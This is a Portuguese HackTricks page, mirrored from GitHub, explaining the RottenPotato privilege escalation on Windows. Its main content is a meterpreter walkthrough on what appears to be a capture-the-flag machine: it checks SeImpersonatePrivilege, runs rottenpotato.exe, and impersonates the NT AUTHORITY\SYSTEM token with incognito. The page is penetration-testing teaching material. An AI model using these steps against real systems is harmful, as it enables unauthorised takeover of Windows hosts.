mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
106 lines
5.7 KiB
Markdown
106 lines
5.7 KiB
Markdown
# RottenPotato
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
As contas de serviço geralmente possuem privilégios especiais (SeImpersonatePrivileges) e isso pode ser usado para escalar privilégios.
|
|
|
|
[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
|
|
|
|
Não entrarei em detalhes sobre como esse exploit funciona, o artigo acima explica muito melhor do que eu poderia.
|
|
|
|
Vamos verificar nossos privilégios com o meterpreter:
|
|
```
|
|
meterpreter > getprivs
|
|
|
|
Enabled Process Privileges
|
|
==========================
|
|
|
|
Name
|
|
----
|
|
SeAssignPrimaryTokenPrivilege
|
|
SeChangeNotifyPrivilege
|
|
SeCreateGlobalPrivilege
|
|
SeImpersonatePrivilege
|
|
SeIncreaseQuotaPrivilege
|
|
SeIncreaseWorkingSetPrivilege
|
|
```
|
|
Excelente, parece que temos os privilégios necessários para realizar o ataque. Vamos fazer o upload do `rottenpotato.exe`.
|
|
|
|
De volta à nossa sessão do meterpreter, carregamos a extensão `incognito`.
|
|
```
|
|
meterpreter > use incognito
|
|
Loading extension incognito...Success.
|
|
meterpreter > list_tokens -u
|
|
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
|
|
Call rev2self if primary process token is SYSTEM
|
|
|
|
Delegation Tokens Available
|
|
========================================
|
|
NT SERVICE\SQLSERVERAGENT
|
|
NT SERVICE\SQLTELEMETRY
|
|
TALLY\Sarah
|
|
|
|
Impersonation Tokens Available
|
|
========================================
|
|
No tokens available
|
|
```
|
|
Podemos ver que atualmente não temos Tokens de Impersonação. Vamos executar o exploit Rotten Potato.
|
|
```
|
|
meterpreter > execute -f rottenpotato.exe -Hc
|
|
Process 3104 created.
|
|
Channel 2 created.
|
|
meterpreter > list_tokens -u
|
|
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
|
|
Call rev2self if primary process token is SYSTEM
|
|
|
|
Delegation Tokens Available
|
|
========================================
|
|
NT SERVICE\SQLSERVERAGENT
|
|
NT SERVICE\SQLTELEMETRY
|
|
TALLY\Sarah
|
|
|
|
Impersonation Tokens Available
|
|
========================================
|
|
NT AUTHORITY\SYSTEM
|
|
```
|
|
Precisamos rapidamente assumir a identidade do token ou ele desaparecerá.
|
|
```
|
|
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
|
|
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
|
|
Call rev2self if primary process token is SYSTEM
|
|
[-] No delegation token available
|
|
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
|
|
meterpreter > getuid
|
|
Server username: NT AUTHORITY\SYSTEM
|
|
```
|
|
Sucesso! Temos nosso shell SYSTEM e podemos pegar o arquivo root.txt!
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|